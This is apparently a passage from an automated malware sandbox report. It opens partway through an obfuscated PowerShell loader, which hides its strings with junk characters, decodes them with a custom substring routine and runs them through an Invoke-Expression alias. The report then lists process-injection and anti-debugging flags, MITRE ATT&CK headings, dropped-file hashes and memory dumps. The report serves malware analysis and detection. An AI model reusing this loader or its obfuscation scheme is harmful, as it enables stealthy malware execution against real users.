B4 K8KrC FBFi2 ABRe9KoASp9ItBfi1caBPrDBrATa8RaBKr3TyBMaFNeASt5koAmyFPlANo8PeB H5reBSkFPoEIcFDuF BC GFPl8 A9 TFDeB S3 JBWa2EsAAn8BaBDrDAaBIn5InBst2RsBHa9ReAPuEReA PFinFEuC TFHu8Nu9 B7 RBSmDSeBSy2CoB OD HB H1 OATo5NiB OFnaBde5ExBKi2TyEwo8OmFSt5PsF S0 sFTaCTuFSe4Ju8 SCNyBUd2SpBRe9kaA K9JaB F1UnBBuDShASc8EvBKr3CaBMaF DASt5ChA HFskAPy8moBUn5 CBRkFskE TEDaFBeCHa9OvC AFKo4Do8Ca7Sk9Er5SyBSn2 LAHo8MiE PFSiESnERe8Br1InFVr0DiFAsCbo8Su7 T9 u5GlBUn2DaASe8DuESoFBaEReE S8Ch1 EFKi0tvFstCGv8 I7 S9St5 BBpo2UdAko8UnE UFPsECaEte8Op1 SFDe0uoFhvCAp8Ja7 S9 N5trBCl2 GAva8BlEScFJoEPeEAr8Me1FoFTe0DrFInC T8By7 S9Un5SlBim2 DApo8ToEenFSpEBuEOp8 H1 GFNo0PaFSvCAn8Ki7Pl9Ps5CiBAl2OrARe8NoE IFPrEMaEFi8Ta1 FFim5ViFGlCVeFti4st8Pr7Ri9Bl5 CBLe2beAMe8maEpaF FESaERe8St1ReFri5 OFTi5ViFHu5Ch'mo) R;In&Ne( J`$ SKFoaGanRoaKomKryKocVii An U7Pr) L se( OMSaaBar siCllpyiManRaaFo0Mo4Re Ka' SFPa8Sc8 CFSuBPeBPrB B2 BBFu5ImBDi2OnBDiBPhANoF GFVaCfoEHa1SpFUnCGn8Wh7Ch8MoFPrAPr5SaANoFpaA C8TaBFo9PrBBn1LoFPj2Ha8EsE SAUn9NoBAm2SlAKl8 MBTa5PeBKr1 ABPo9ChF S2 U9Si5GeBSk2ToA R8leBRv9LaANoEskBun3SpAKaCPe8EfFvoBAn9 EAEmE CAPeADaB R5TrBAgFSkBBe9StAUnF SF S2bl9 M1 DBFaDPhAHoEUnAKrFKiBUn4UnBJaDDoBCl0 d8Ak1SeEAu6NeEOm6Di9DiBAuBKi9AnAKa8Vi9Bo8KlBBi9MoBIn0diBEm9ToBStB DBBrDSnAUn8DrBEx9Ka9PhASaBFr3syAStE S9InADyA N9PaBDe2 DBdiFSoACl8 MBIn5FaBFl3CaBtr2Ba8UrCKiBNi3NeBwa5BeB N2duA S8 uB c9UtAPrE RFFo4ZoFLi4 a8 DC WBBr2CaB S9TeAWa9PuBUd1 PBFoD CADa8TnBMe3RhBbuFJeA r5 SAMaFSuAGu8ChBNo5PoBSoFNaEAvFSnFEnCAnFIn8Se9HjFDaB m3AuB C2NoA W8SkBUnD BBIm5YdBCo2EdBNy9FoAmeEBlAMuF FFnoC PFDd8Un9Ca7ImBCuD ABAm2trBpuD UBFo1CoAlu5ReBInFteBch5 BBWe2ChE mAHaFFo5ToFRe0HyFmeCGoFCe4Te8OpCGeB B2StBSr9StARe9prBhi1UiBBaDReA P8NaBFa3TiBPeFBoAOd5 SADeFFlASl8 KBTe5rhBFaFStE SE BF aCCl9 ECFlFDi4 U8Ka7 M9Sa5 rBRh2SuA I8SyELgFKuErhEFr8Br1 lFEn0ReFBaCWa8Pt7Ar9gr5AfBGl2 EASa8kaE KFAlE AELy8Op1 CF F0FuFStCRe8bo7 s9Sp5TaBDi2 sA A8 JESuF sE DEBe8Wi1TwF R0ReFCoC T8Cy7Sl9 S5ToBSp2CoAAr8UdELaFUaEBeEAf8ru1 TFar0 AFSeCla8 d7Pi9Rd5MiBAu2 BA P8KoE YF AE AEEa8 W1BrFRa5TrFStCLaFPa4Pr8En7Fr9Ca5GeBCh2LeAsu8 K8PeCStA P8 TAUnE B8In1PhFVa5HeFEu5KnFou5jo' N)Sd;Ko&Re( N`$InKSca EnDyaAnm Uy FcThiRenre7Kb)Fo bu(FrMSta MrHui BlcoiSknReaBe0Dy4Un f'GrFFe8Co8DeFStB C2edBPe9EkB o7FeA CEAnBSi9SmBHj8 TAPrFInFBoCheESe1 SFThC WFIm8Di8 LCUnA MFopBTr9anA G9TiBFr8 SBOp3MiBSy2EqAIn9skBDiFMaBAr0skBFo9GrBUv5NoBBa2BlFLn2Re9Kn5NoB S2PaA IACuBUo3MaB K7GeBSk9AnF A4DoFDe1RiETuDphFbg0 HETaCEtFFo0ChECoAHaEUm8 TFHj0SeEFuC CFBi0JoFBiCMaEExAjoEJoESeE S5CaEFlCInEMeA SEUnF AE RACoEEc4 KFRo0 RELaC IFCa5Ti'my) S;Ga&Te(In`$ DKNeaTrn NaCumBeyUdc CiRenFe7Gr)Ra su(noMKaa KrBri BlNoiBenCeaNe0 K4St O' CFSk8Th8MaFReAOt8 BBRa6 SARe5MiBSk8YaBAm9KoAStEelFDeCNoEwa1 EFDeC BFTi8Vo8CaFPlBGaB LB E2 RBBa5PhBOv2SuBTeB OAMeFReFNo2Pa9 R5DoBSa2FrAEuASvBap3 bB U7caB U9AcFSm4CoFBe8Ba8StF PBGr2DeBVe9FlBMe7EuAMiEadBsp9RuBvo8HeARuFSpF H0ObECyCVk8 G4DiEBeETeETrE HFPe0ldEReCLsFSm0NaE bCstF V0FeEArCFrFKa5Wh' M)St;Re`$PaT drBeidanGliFatNoaUnrDeiDeaCrnDyiRosMumSu2 T=Di`"""Ro`$PreUnnCuv P:ReTToEraM MPHj\madbaistsLshIhaCorApmHuoUnnGeiSvsTreDi\ esEltMreSpnKolSkoUne PsLieFo\BrDKayArrOveFakemoAbnEktForNooTelSklBee FnHesSt\FrF AoAbrUnuWorOveMan Ui Hn HgSvsParStaFrapldRie btStsSp\DdDKeyelr UeBlfafoIndCyeUnrBa\IsKMeopakUnoAg\OvS StBirBaaKlnOvd ArgaePhtSotfoe Bn F. KDOpeSvp C`"""Ag;Ne&Ta( a`$SqKAfaUnn aa PmTayBrcSli GnOb7bi)De In(CoMKua Ur SiLdlSiiAnnYaaPa0Ln4La Ka'UnFSy8PrBAc2LgB P3DeAFo8RfB MDFaBOmEHeBBu5 BBAn0InBdr5ArA H8AuATy5TnFTuCfoEUd1GlFSkCAl8 M7 T8OuFweAUn5DiAKoF OARe8PiBPe9FoBVo1CaFAn2Bo9Sc5 M9So3quFOu2Th9 SAStBEf5flB F0OlBTu9 a8Co1AsEBe6InEVa6sk8UnEKoB F9 AB KDKaBOu8Sk9SeDYeBFr0 MB K0Rg9 GEBaALu5BlAsu8 RB E9GlAOpFWiFhj4 BFCo8si8Af8RaACiEVaBAl5AsBEn2 BBmi5spA T8UnB IDFoAReEAmBNo5GiBSuDSfB D2SyBKn5NaA OF UB M1 VERoE FFBi5Cu' B)Gr;Op`$PoQKou AaCotBuoSkrGezHaa UiDanOm=Vs`$GanCaoJatNaazybCaistlPriIntTeyGr.skc SoPruStnNatAp-Kr1Ko0Ho2Ud4Mo;Su&Rk(Do`$AnKPraCanTra ImUnyVic siMon L7Re)Ma C(StMKoaDerskiPolariPan UaRa0 S4Mi Bi'Su8Tr7Re8HyFUnA K5 RAMeFPsA Q8KoBDa9veBke1DiF P2 p8MoEAvAAn9VrBMi2CeA B8ApBBe5CaBAn1DuBth9DuFhu2 B9Ba5 nBSk2 EAUn8UnB d9VrA FE YBBo3MbAHuCCa8MaFFaBAf9enAneEgoAGlAsyBSy5BiB LFKoB P9udADoFPaFIs2Ag9Va1LaBAnD PA TEOrApeFAfB I4CoBFaD rBCe0Lo8Jo1InE U6AfEYt6In9 GFInBBy3slAneCPaAde5PlFCo4OvFIn8VeB S2AlBde3MyAPa8PyBLuDalBReECoBin5 OBEk0GrBbe5MeA C8NoALi5 PFFa0SaFPlC EE AD UESeCPoEklESqEGy8PoFUn0BeFPrCClFTi8Ch8diFWiAAm8DiB A6BoAFl5NeB H8StB F9KaAPaEUnFTa0prFSkCSaFJo8Tr8 PDSyASa9UnB RDSpAFa8AnBsp3 BAgaESoA V6CoBKeDTiBKa5EkBHi2SuFOp5Lu'Ar)Al;So&Me( A`$DeKLaa OnEna TmSfyHacBiiUnnKu7Mi)Al Re(HeM UaForThiSplKvihanTea U0 I4Sc Le'EmFSt8 H8Ta9KrALyFUnBSoDSuASoFAlFAgC rEAr1VeFAdCMi8Ol7Fi8UnFDeASp5BlABoFMaASp8PrBBo9 UBNo1 PFfr2 I8 ME TAVi9AwBHe2 LAOm8TiBBl5 dBVe1 rBIn9 IFPa2 s9Fl5 BB S2LeAGo8DvB R9DyAInEKoBKo3TiAHaCTe8 PF DB J9CaAGuE HAChAReB G5DiBFrF ABCr9SyAReFVeFNa2Ou9 M1ReBOvDPrAOvEGnAcuFCoBMo4KnBKyDPnB d0 R8Os1 AE H6auERe6Pa9teBUnBHo9BaAFa8Si9Gi8FlBAn9AmBde0 SB A9 MBGuBbrBMaDPaAAn8AdBDa9 K9InAafBIn3buAEmEYu9BeA RA O9EnBSu2HfBwhFCoATr8MiBIn5KoBSt3VaB I2Sa8CaC NBBu3InB K5GdBCu2 TAUn8krBSk9BoASaESuFVi4 DFSc4Pr8 MC EBvi2 PB P9StAPa9GyBVe1MaBCeDGrAIn8 GBAf3 SBMeFWeAAn5 SAEnFRiAAc8VeBUn5FiB UFDoEWrFKrFToCMaFti8An9SkF sBSk3FeBGr2NeAAt8JiBFaDUnB F5SaB S2 KBHe9YoA BEPrAFrF GFEpCInFJo8Pi8 SBFeB DDSuAHjAMuBfa9AnAUnEReBDi0CuBSu9 SACh5 UF F5 EFSk0 FF BCMaFLi4Be8 MCPrBmi2PoBTy9InASp9SlBSo1HoB ID LA S8ReBtr3StBBlFUnAQu5AfA DFSaAEt8OpBNs5KaBCaF CEdaEReFVeCPl9SpCSvF C4Em8En7Po9St5 SBEn2StARi8 H8 UCspARi8DuA lE N8Ka1CyFSa0AuF SCId8 A7in9da5EvB I2KoABr8Lo8JuCSkATa8AnA DEMa8ka1 BFOb0 DFgeCOb8Ly7Fo9 H5LiBRe2TaASv8Pl8 SCSuAAr8FaAdeEGe8En1MeFPh5CoFGoCSkF b4 S8Su7Ho9Va5UnBKo2 AABa8Af8PrCPoATe8DoANeE H8 R1DrFSt5SaFSc5NyFVo5In'In) U;Is&Ti(Mu`$upKDiaApnMiaLamSuyLac HiKrnSc7Ne)Hj s(IgM Aa JrIniMulIniTanHkaGe0Ra4Gl te' SF M8Ru8Br9LoAAlFRaB EDFyAPaFPuFTr2 D9De5TuB A2coA EABlBMa3PrBSt7TfB N9FoFKr4paEBeCchFhj0TrFSc8 L8PiFKoAAf8StBPe6 KAAr5ChBMa8HiBCa9siAFoEWaFLe0TrEGlCUdF S5 U'Ot)ap#Ne;""";function Pneumatocystic5 ($Colorable,$Udspecificering) { &$Pneumatocystic0 (Chorai2009 'Si$ElCVroBalTuoByrMiaStbVul PeVi O-PjbudxAdoLor b F$AaUGydLisafpAie TcPriPrfMoiOscShe UrLeiPhnIngKl ');}Function Chorai2009 { param([String]$Malerkunsternes); $Tephra87=2+1; For($Reincarnationism=2; $Reincarnationism -lt $Malerkunsternes.Length-1; $Reincarnationism+=($Tephra87)){ $Undifficultly = 'su'+'bstri'+'ng'; $Marilina = $Marilina + $Malerkunsternes.$Undifficultly.Invoke($Reincarnationism, 1); } $Marilina;}$Pneumatocystic0 = Chorai2009 'SpIbaETeXWo ';&$Pneumatocystic0 (Chorai2009 $Baandsprjtende);<#Malayize Foreheater Udstillingscenter rudimentres #>;"
    3⤵
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1644
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
      4⤵
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2216
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 2564
        5⤵
        Program crash
        
        PID:4932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 200 -p 2216 -ip 2216
1⤵
PID:4060

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
fc208db13b1239bfa1f4ee94d3505352

SHA1
c998505025d8ac13f7052a4decd767fdc89020e3

SHA256
bfb025eec226b78ba8230ab9a034404627919ee26cd9cd3954526b5954b11206

SHA512
60a8dd3bc269a47ede1459016ca8d641ac6078d8b160c3f12929f56c1f384f89c08a61642acedf59d2bbf4702232eabac6392f12ab9d037a911adce0e73bea67

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zof4qtl3.h5q.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\disharmonise\stenloese\Dyrekontrollens\Forureningsraadets\Dyrefoder\Koko\Sodavandsflaskernes.Pro232

Filesize
20KB

MD5
3da163f8c95bcf4036691f11576826b2

SHA1
039c22df2bd355dd49a6fec2ab978df9b6ff20b4

SHA256
ee7cc03bedf4af2105d59faecbd6b09327679d414ddb7a70c1a308989b9f78eb

SHA512
4fee0d439d8435619c291da72d23469b9d7281914ee022fdc779c47ddb983d9d9bb789a900fc2b9714393350b3ba4f7a47838709535d75f1d9f979961cb809aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\disharmonise\stenloese\Dyrekontrollens\Forureningsraadets\Dyrefoder\Koko\Strandretten.Dep

Filesize
371KB

MD5
90c72b2898a0bf8b7398994f12dd2dc8

SHA1
afdc22df2bb467fd24bd3f07a525cb3020663b6d

SHA256
dd7566d4311207997cb25d9c78b3fb2c04a365f40446adb5a468c0ee12502528

SHA512
b0dbb30f1ea8da4fb30e1f3f7ef1ead7b0cc2c5c4278ff3d705881be99d7dc706fa5349e1321c9027f3d7f978592212a0f97730c3830eea81eb42df7cfcf80ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\nspD12D.tmp\nsExec.dll

Filesize
6KB

MD5
35200be9cf105f3defe2ae0ee44cea12

SHA1
3f4a09eeb477d3f048cdfb848b95aa39b20d89dc

SHA256
0096ae873c75f4e4d802dc97eec9893acc0749a7346e63f25a8d52ba8e11c527

SHA512
f8f7d8a844d588c6e2d6dc54e0d4bcbb1c4229a6e8f4d110a5e3d47eb0b8b5e0860ff5d31762229a731e08d7b232468b2a78c29778a9f0c62a7381db89175833

Download Submit
memory/1644-61-0x0000000002DF0000-0x0000000002E00000-memory.dmp

Filesize
64KB

Download
memory/1644-62-0x0000000002DF0000-0x0000000002E00000-memory.dmp

Filesize
64KB

Download
memory/1644-51-0x0000000007E40000-0x00000000084BA000-memory.dmp

Filesize
6.5MB

Download
memory/1644-41-0x0000000002DF0000-0x0000000002E00000-memory.dmp

Filesize
64KB

Download
memory/1644-40-0x0000000002DF0000-0x0000000002E00000-memory.dmp

Filesize
64KB

Download
memory/1644-59-0x0000000077D31000-0x0000000077E51000-memory.dmp

Filesize
1.1MB

Download
memory/1644-39-0x0000000075310000-0x0000000075AC0000-memory.dmp

Filesize
7.7MB

Download
memory/1644-73-0x0000000075310000-0x0000000075AC0000-memory.dmp

Filesize
7.7MB

Download
memory/1644-60-0x0000000075310000-0x0000000075AC0000-memory.dmp

Filesize
7.7MB

Download
memory/2216-74-0x0000000075310000-0x0000000075AC0000-memory.dmp

Filesize
7.7MB

Download
memory/2216-64-0x0000000077D31000-0x0000000077E51000-memory.dmp

Filesize
1.1MB

Download
memory/2216-63-0x0000000077DB8000-0x0000000077DB9000-memory.dmp

Filesize
4KB

Download
memory/2216-71-0x000000006FE10000-0x0000000071064000-memory.dmp

Filesize
18.3MB

Download
memory/2216-72-0x0000000000900000-0x00000000044FE000-memory.dmp

Filesize
60.0MB

Download
memory/2216-75-0x000000006FE10000-0x000000006FE52000-memory.dmp

Filesize
264KB

Download
memory/2216-79-0x0000000022A40000-0x0000000022A50000-memory.dmp

Filesize
64KB

Download
memory/2216-81-0x0000000000900000-0x00000000044FE000-memory.dmp

Filesize
60.0MB

Download
memory/2216-83-0x0000000075310000-0x0000000075AC0000-memory.dmp

Filesize
7.7MB

Download
memory/3240-35-0x00000000062A0000-0x00000000062BA000-memory.dmp

Filesize
104KB

Download
memory/3240-36-0x0000000006320000-0x0000000006342000-memory.dmp

Filesize
136KB

Download
memory/3240-55-0x0000000004900000-0x0000000004910000-memory.dmp

Filesize
64KB

Download
memory/3240-14-0x0000000075310000-0x0000000075AC0000-memory.dmp

Filesize
7.7MB

Download
memory/3240-58-0x0000000004900000-0x0000000004910000-memory.dmp

Filesize
64KB

Download
memory/3240-16-0x0000000004F40000-0x0000000005568000-memory.dmp

Filesize
6.2MB

Download
memory/3240-17-0x0000000004900000-0x0000000004910000-memory.dmp

Filesize
64KB

Download
memory/3240-13-0x00000000047C0000-0x00000000047F6000-memory.dmp

Filesize
216KB

Download
memory/3240-37-0x0000000007410000-0x00000000079B4000-memory.dmp

Filesize
5.6MB

Download
memory/3240-53-0x0000000075310000-0x0000000075AC0000-memory.dmp

Filesize
7.7MB

Download
memory/3240-18-0x0000000004DF0000-0x0000000004E12000-memory.dmp

Filesize
136KB

Download
memory/3240-34-0x0000000006DC0000-0x0000000006E56000-memory.dmp

Filesize
600KB

Download
memory/3240-33-0x0000000004900000-0x0000000004910000-memory.dmp

Filesize
64KB

Download
memory/3240-32-0x0000000005DF0000-0x0000000005E3C000-memory.dmp

Filesize
304KB

Download
memory/3240-31-0x0000000005DA0000-0x0000000005DBE000-memory.dmp

Filesize
120KB

Download
memory/3240-30-0x00000000057C0000-0x0000000005B14000-memory.dmp

Filesize
3.3MB

Download
memory/3240-78-0x0000000075310000-0x0000000075AC0000-memory.dmp

Filesize
7.7MB

Download
memory/3240-20-0x0000000005750000-0x00000000057B6000-memory.dmp

Filesize
408KB

Download
memory/3240-15-0x0000000004900000-0x0000000004910000-memory.dmp

Filesize
64KB

Download
memory/3240-19-0x00000000056E0000-0x0000000005746000-memory.dmp

Filesize
408KB

Download